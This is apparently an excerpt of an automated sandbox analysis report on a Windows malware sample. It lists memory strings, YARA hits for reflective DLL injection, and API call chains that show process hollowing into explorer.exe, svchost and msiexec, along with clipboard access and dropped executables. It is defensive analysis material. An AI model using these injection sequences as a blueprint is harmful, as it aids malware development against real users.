              Source: 21AB.tmp.zx.exe, 0000000C.00000003.1614722302.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1614148067.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603800647.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5AE000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1613198767.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
              Source: explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFB84B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0DFB84B0
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFB86A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0DFB86A0
              Source: C:\Windows\explorer.exeCode function: 5_2_0E1186A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0E1186A0
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF586A0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0FF586A0
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFB84B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0DFB84B0

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 5.0.explorer.exe.e100000.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.8220535.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.e080535.5.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.c1b2c20.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.ff40000.7.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.c166810.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.e100000.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.dfa0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c166810.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.c1b2c20.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c1b2c20.4.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.dfa0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.dfa0000.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 4.3.msiexec.exe.21e1f7d9930.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.ded0535.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 3.2.svchost.exe.1f00d07e000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.e080535.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.e080535.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 2.3.audiodg.exe.1a265740d60.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c1b2c20.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 3.2.svchost.exe.1f00d07e000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.e080535.4.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.ded0535.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.dfa0000.4.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c1b2c20.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 2.3.audiodg.exe.1a265740d60.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.c1b2c20.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.ded0535.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c166810.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.ff40000.7.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.e100000.6.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.e100000.5.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.ded0535.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.3.explorer.exe.c1b2c20.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.2.explorer.exe.8220535.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.c1b2c20.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 4.3.msiexec.exe.21e1f7d9930.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 5.0.explorer.exe.c166810.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000000.1435821747.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000000.1436005236.000000000E100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000003.00000002.2672467655.000001F00D07E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C24CC GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF7E83C24CC
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0470 RtlCaptureContext,NtQueryInformationProcess,5_2_0DFD0470
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0470 RtlCaptureContext,NtQueryInformationProcess,5_2_0DFD0470
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA1370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,5_2_0DFA1370
              Source: C:\Windows\explorer.exeCode function: 5_2_0E130470 RtlCaptureContext,NtQueryInformationProcess,5_2_0E130470
              Source: C:\Windows\explorer.exeCode function: 5_2_0E130470 RtlCaptureContext,NtQueryInformationProcess,5_2_0E130470
              Source: C:\Windows\explorer.exeCode function: 5_2_0E101370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,5_2_0E101370
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF70470 RtlCaptureContext,NtQueryInformationProcess,5_2_0FF70470
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF70470 RtlCaptureContext,NtQueryInformationProcess,5_2_0FF70470
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF41370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,5_2_0FF41370
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeCode function: 7_2_00007FF6C5DB24CC GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,7_2_00007FF6C5DB24CC
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C340C0_2_00007FF7E83C340C
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C24CC0_2_00007FF7E83C24CC
              Source: C:\Windows\System32\svchost.exeCode function: 3_2_00007FF67E6D340C3_2_00007FF67E6D340C
              Source: C:\Windows\System32\svchost.exeCode function: 3_2_00007FF67E6D24CC3_2_00007FF67E6D24CC
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA17F05_2_0DFA17F0
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFAA6205_2_0DFAA620
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA6E105_2_0DFA6E10
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC05F85_2_0DFC05F8
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFCA5F05_2_0DFCA5F0
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFCED325_2_0DFCED32
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC0C385_2_0DFC0C38
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC2C145_2_0DFC2C14
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFCD4045_2_0DFCD404
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC9FCC5_2_0DFC9FCC
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC576C5_2_0DFC576C
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC2EAC5_2_0DFC2EAC
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFCE6005_2_0DFCE600
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFCB1D85_2_0DFCB1D8
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA794D5_2_0DFA794D
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA79435_2_0DFA7943
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA793B5_2_0DFA793B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA79315_2_0DFA7931
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA79275_2_0DFA7927
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA791D5_2_0DFA791D
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA78905_2_0DFA7890
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC53BC5_2_0DFC53BC
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFCCBB05_2_0DFCCBB0
              Source: C:\Windows\explorer.exeCode function: 5_2_0E106E105_2_0E106E10
              Source: C:\Windows\explorer.exeCode function: 5_2_0E12E6005_2_0E12E600
              Source: C:\Windows\explorer.exeCode function: 5_2_0E10A6205_2_0E10A620
              Source: C:\Windows\explorer.exeCode function: 5_2_0E122EAC5_2_0E122EAC
              Source: C:\Windows\explorer.exeCode function: 5_2_0E12576C5_2_0E12576C
              Source: C:\Windows\explorer.exeCode function: 5_2_0E129FCC5_2_0E129FCC
              Source: C:\Windows\explorer.exeCode function: 5_2_0E1017F05_2_0E1017F0
              Source: C:\Windows\explorer.exeCode function: 5_2_0E122C145_2_0E122C14
              Source: C:\Windows\explorer.exeCode function: 5_2_0E12D4045_2_0E12D404
              Source: C:\Windows\explorer.exeCode function: 5_2_0E120C385_2_0E120C38
              Source: C:\Windows\explorer.exeCode function: 5_2_0E12ED325_2_0E12ED32
              Source: C:\Windows\explorer.exeCode function: 5_2_0E12A5F05_2_0E12A5F0
              Source: C:\Windows\explorer.exeCode function: 5_2_0E1205F85_2_0E1205F8
              Source: C:\Windows\explorer.exeCode function: 5_2_0E12CBB05_2_0E12CBB0
              Source: C:\Windows\explorer.exeCode function: 5_2_0E1253BC5_2_0E1253BC
              Source: C:\Windows\explorer.exeCode function: 5_2_0E1078905_2_0E107890
              Source: C:\Windows\explorer.exeCode function: 5_2_0E10791D5_2_0E10791D
              Source: C:\Windows\explorer.exeCode function: 5_2_0E1079315_2_0E107931
              Source: C:\Windows\explorer.exeCode function: 5_2_0E10793B5_2_0E10793B
              Source: C:\Windows\explorer.exeCode function: 5_2_0E1079275_2_0E107927
              Source: C:\Windows\explorer.exeCode function: 5_2_0E1079435_2_0E107943
              Source: C:\Windows\explorer.exeCode function: 5_2_0E10794D5_2_0E10794D
              Source: C:\Windows\explorer.exeCode function: 5_2_0E12B1D85_2_0E12B1D8
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF417F05_2_0FF417F0
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF69FCC5_2_0FF69FCC
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF6576C5_2_0FF6576C
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF62EAC5_2_0FF62EAC
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF4A6205_2_0FF4A620
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF46E105_2_0FF46E10
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF6E6005_2_0FF6E600
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF6A5F05_2_0FF6A5F0
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF605F85_2_0FF605F8
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF6ED325_2_0FF6ED32
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF60C385_2_0FF60C38
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF62C145_2_0FF62C14
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF6D4045_2_0FF6D404
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF6CBB05_2_0FF6CBB0
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF653BC5_2_0FF653BC
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF6B1D85_2_0FF6B1D8
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF479435_2_0FF47943
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF4794D5_2_0FF4794D
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF479315_2_0FF47931
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF4793B5_2_0FF4793B
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF479275_2_0FF47927
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF4791D5_2_0FF4791D
              Source: C:\Windows\explorer.exeCode function: 5_2_0FF478905_2_0FF47890
              Source: C:\Windows\explorer.exeCode function: 5_2_082450A15_2_082450A1
              Source: C:\Windows\explorer.exeCode function: 5_2_082211255_2_08221125
              Source: C:\Windows\explorer.exeCode function: 5_2_082499015_2_08249901
              Source: C:\Windows\explorer.exeCode function: 5_2_082271C55_2_082271C5
              Source: C:\Windows\explorer.exeCode function: 5_2_082272625_2_08227262
              Source: C:\Windows\explorer.exeCode function: 5_2_0822726C5_2_0822726C
              Source: C:\Windows\explorer.exeCode function: 5_2_082272765_2_08227276
              Source: C:\Windows\explorer.exeCode function: 5_2_0822724E5_2_0822724E
              Source: C:\Windows\explorer.exeCode function: 5_2_082272585_2_08227258
              Source: C:\Windows\explorer.exeCode function: 5_2_082272805_2_08227280
              Source: C:\Windows\explorer.exeCode function: 5_2_0824056D5_2_0824056D
              Source: C:\Windows\explorer.exeCode function: 5_2_082425495_2_08242549
              Source: C:\Windows\explorer.exeCode function: 5_2_082267455_2_08226745
              Source: C:\Windows\explorer.exeCode function: 5_2_082427E15_2_082427E1
              Source: C:\Windows\explorer.exeCode function: 5_2_0DEF056D5_2_0DEF056D
              Source: C:\Windows\explorer.exeCode function: 5_2_0DEF25495_2_0DEF2549
              Source: C:\Windows\explorer.exeCode function: 5_2_0DEF27E15_2_0DEF27E1
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED67455_2_0DED6745
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED71C55_2_0DED71C5
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED11255_2_0DED1125
              Source: C:\Windows\explorer.exeCode function: 5_2_0DEF99015_2_0DEF9901
              Source: C:\Windows\explorer.exeCode function: 5_2_0DEF50A15_2_0DEF50A1
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED72805_2_0DED7280
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED726C5_2_0DED726C
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED72625_2_0DED7262
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED72765_2_0DED7276
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED724E5_2_0DED724E
              Source: C:\Windows\explorer.exeCode function: 5_2_0DED72585_2_0DED7258
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0867455_2_0E086745
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0A27E15_2_0E0A27E1
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0A25495_2_0E0A2549
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0A056D5_2_0E0A056D
              Source: C:\Windows\explorer.exeCode function: 5_2_0E08724E5_2_0E08724E
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0872585_2_0E087258
              Source: C:\Windows\explorer.exeCode function: 5_2_0E08726C5_2_0E08726C
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0872625_2_0E087262
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0872765_2_0E087276
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0872805_2_0E087280
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0A50A15_2_0E0A50A1
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0A99015_2_0E0A9901
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0811255_2_0E081125
              Source: C:\Windows\explorer.exeCode function: 5_2_0E0871C55_2_0E0871C5
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeCode function: 6_2_0274DC746_2_0274DC74
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeCode function: 6_2_053DC7086_2_053DC708
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeCode function: 6_2_053DC1286_2_053DC128
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeCode function: 6_2_053DDBA06_2_053DDBA0
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeCode function: 6_2_053DF3F86_2_053DF3F8
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeCode function: 6_2_053DF3E86_2_053DF3E8
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeCode function: 6_2_053D3D406_2_053D3D40
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeCode function: 7_2_00007FF6C5DB340C7_2_00007FF6C5DB340C
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeCode function: 7_2_00007FF6C5DB24CC7_2_00007FF6C5DB24CC
              Source: C:\Windows\System32\audiodg.exeCode function: 9_2_00007FF6EC84340C9_2_00007FF6EC84340C
              Source: C:\Windows\System32\audiodg.exeCode function: 9_2_00007FF6EC8424CC9_2_00007FF6EC8424CC
              Source: C:\Windows\System32\msiexec.exeCode function: 10_2_00007FF6345C340C10_2_00007FF6345C340C
              Source: C:\Windows\System32\msiexec.exeCode function: 10_2_00007FF6345C24CC10_2_00007FF6345C24CC
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250FBD812_2_00007FF7F250FBD8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2515C7412_2_00007FF7F2515C74
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F100012_2_00007FF7F24F1000
